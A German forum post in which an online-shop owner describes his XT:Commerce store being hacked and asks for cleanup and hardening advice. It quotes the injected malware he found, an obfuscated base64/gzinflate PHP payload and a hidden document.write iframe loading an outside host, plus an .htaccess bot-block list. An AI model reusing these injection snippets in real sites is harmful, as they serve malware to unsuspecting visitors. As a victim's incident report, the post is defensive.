Hallo zusammen,
TEIL 1:
ich wollte heute auf meinen Online Shop gehen und auf einmal kam die Nachricht "attackierende Seite" !!!
Sieher hier: Als attackierend gemeldete Website – was tun? : Suchmaschinenoptimierung professionell.
TEIL 2:
Ich bin dann über eine virtuelle Maschine auf meinen Shop gegangen und habe mir sofort einen Trojaner eingefangen!
Dann habe ich mir meine index.html usw. angeschaut und finde auch sofort Codes und IFrames !
SIEHE HIER CODE - zu finden in (SHOP\admin\index.php):
#c3284d#
echo(gzinflate(base64_decode("JY5BDsIgFET3TXoH8jfqpiQuFXoKL/AFBJQCgV/R20vtbvKSNzOiquIzMfpmI4HMh/gT37hTmMdBJ7UuJtLUiidzPAj/KLgYVouS4IjyhfOMzmJ71UmlhevUYkioeSWkOmWXgcVuSLg1T2QKsN6eQvDRSsCVErB/5T0VbYqE2AEGb6ME1Yc3wRlvHUk4A2tek9vSLPh+ZT6cruMg+P55/gE=")));
#/c3284d#
?>
SIEHE HIER IFRAME in index.html - zu finden in (SHOP\usage\index.html):
document.write('<iframe src="http://pahgawks.com/download/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->
TEIL 3: Man sieht in dem IFrame die Seite "http://pahgawks.com/download/stats.php" ich bin mit meiner virtuellen Maschine drauf gegangen und siehe da was plötzlich da steht:
[Blockierte Grafik: http://h11.abload.de/img/asdadsdsddaj2jnh.jpg]
Ich frage EUCH, kann DAS überhaupt sein???? Der Kerl muss den Text schon länger dort stehen haben... und ich wurde gestern am (7.7.12) gehackt und erst da trat der IFrame auf!!! Kann mir nicht vorstellen das der Typ von nichts weis und so tut als wäre es normal das es über seinen Server läuft ?!?!?
4. Nun meine Fragen... was TUN? Es ist ein Notfall, der Shop hält mich über Wasser!
Ich habe ein KOMPLETT Trojanerfreies Backup vom ganzen Shop!
Wie gehe ich nun vor?
Habe grad ALLE FTP Dateien gelöscht.
Sollte ich nun Strato anschreiben und denen sagen das die meinen FTP komplett cleanen sollen und nach shell scripts absuchen sollen oder soetwas, oder ist das hinfällig da ich alles gelöscht habe?
Oder sollen die vorallem IHREN SERVER cleanen, es kann ja sein das der gesamte Server gehackt wurde, oder?
Wenn soweit von Seiten Strato alles SAUBER ist, kann ich bedenkenlos mein ShopBackup draufladen und den Shop neu hochfahren?
5. Wenn der Shop wieder läuft, wo bekomme ich die besten und neusten Sicherheitsupdates für einen XT COMMERCE 3.0.4 Shop? Suche gerade und finde nichts passendes, BITTE wirklich um hilfe!
6. In einem anderen Thread schrieb jemand, man sollte auf jeden Fall folgende Liste in die ".htaccess" schreiben:
# Sperre nach Agent
SetEnvIfNoCase user-agent "1337" bad_bot=1
SetEnvIfNoCase user-agent "acont" bad_bot=1
SetEnvIfNoCase user-agent "CatchBot" bad_bot=1
SetEnvIfNoCase user-agent "Daumoa" bad_bot=1
SetEnvIfNoCase user-agent "DomainCrawler" bad_bot=1
SetEnvIfNoCase user-agent "DotBot" bad_bot=1
SetEnvIfNoCase user-agent "DTS Agent" bad_bot=1
SetEnvIfNoCase user-agent "dug-portal" bad_bot=1
SetEnvIfNoCase user-agent "EuripBot" bad_bot=1
SetEnvIfNoCase user-agent "Eurobot" bad_bot=1
SetEnvIfNoCase user-agent "FDM" bad_bot=1
SetEnvIfNoCase user-agent "findlinks" bad_bot=1
SetEnvIfNoCase user-agent "FollowSite" bad_bot=1
SetEnvIfNoCase user-agent "Grub" bad_bot=1
SetEnvIfNoCase user-agent "iCcrawler" bad_bot=1
SetEnvIfNoCase user-agent "JadynAveBot" bad_bot=1
SetEnvIfNoCase user-agent "Java" bad_bot=1
SetEnvIfNoCase user-agent "Jyxobot" bad_bot=1
SetEnvIfNoCase user-agent "libwww" bad_bot=1
SetEnvIfNoCase user-agent "LinkWalker" bad_bot=1
SetEnvIfNoCase user-agent "lmspider" bad_bot=1
SetEnvIfNoCase user-agent "Mechanize" bad_bot=1
SetEnvIfNoCase user-agent "MJ12bot" bad_bot=1
SetEnvIfNoCase user-agent "MLBot" bad_bot=1
SetEnvIfNoCase user-agent "Netluchs" bad_bot=1
SetEnvIfNoCase user-agent "Ocelli" bad_bot=1
SetEnvIfNoCase user-agent "Plonebot" bad_bot=1
SetEnvIfNoCase user-agent "psbot" bad_bot=1
SetEnvIfNoCase user-agent "Rexyobot" bad_bot=1
SetEnvIfNoCase user-agent "ruky" bad_bot=1
SetEnvIfNoCase user-agent "Sapphire" bad_bot=1
SetEnvIfNoCase user-agent "ScoutJet" bad_bot=1
SetEnvIfNoCase user-agent "Seekbot" bad_bot=1
SetEnvIfNoCase user-agent "Speedy Spider" bad_bot=1
SetEnvIfNoCase user-agent "SurveyBot" bad_bot=1
SetEnvIfNoCase user-agent "susie" bad_bot=1
SetEnvIfNoCase user-agent "Toplistbot" bad_bot=1
SetEnvIfNoCase user-agent "Twiceler" bad_bot=1
SetEnvIfNoCase user-agent "Updater" bad_bot=1
SetEnvIfNoCase user-agent "WebDataCentreBot" bad_bot=1
SetEnvIfNoCase user-agent "weive" bad_bot=1
SetEnvIfNoCase user-agent "Yandex" bad_bot=1
SetEnvIfNoCase user-agent "Yanga" bad_bot=1
SetEnvIfNoCase user-agent "Yeti" bad_bot=1
# Sperre nach IP
SetEnvIfNoCase remote_addr "^91.98.*" bad_bot=1
# Sperre nach Request
SetEnvIfNoCase request_uri "^w00tw00t.*" bad_bot=1
<FilesMatch "(.*)">
Order Allow,Deny
Allow from all
Deny from env=bad_bot
</FilesMatch>
Meine Frage wäre nun wie das aussehen würde (habe da keine Ahnung von)?!
Erstelle ich eine neue Datei die so heißt und wenn ja, wo wird die im Shop abgelegt?
Oder änder ich z.B eine .htacces die im HAUPT-Shop-Ordner liegt?
Dort steht gerade folgendes drin:
RewriteEngine off
DirectoryIndex webalizer.html
AuthUserFile /www/htdocs/w0ssdg38e//usage//.htpasswd
AuthGroupFile /dev/null
AuthName ByPassword
AuthType Basic
<Limit GET POST>
require user w00ba88e
</Limit>
Würde man die Liste von oben einfach unter das </Limit> kopieren, oder wie muss soetwas dann aussehen?
EDIT: 7. Kann ich auch in die htacces reinschreiben das DIREKT Auslands IPs (russland/china) komplett gesperrt werden?? Ist das machbar? Wenn ja, wie?
Danke schonmal und ich hoffe mir kann jemand helfen 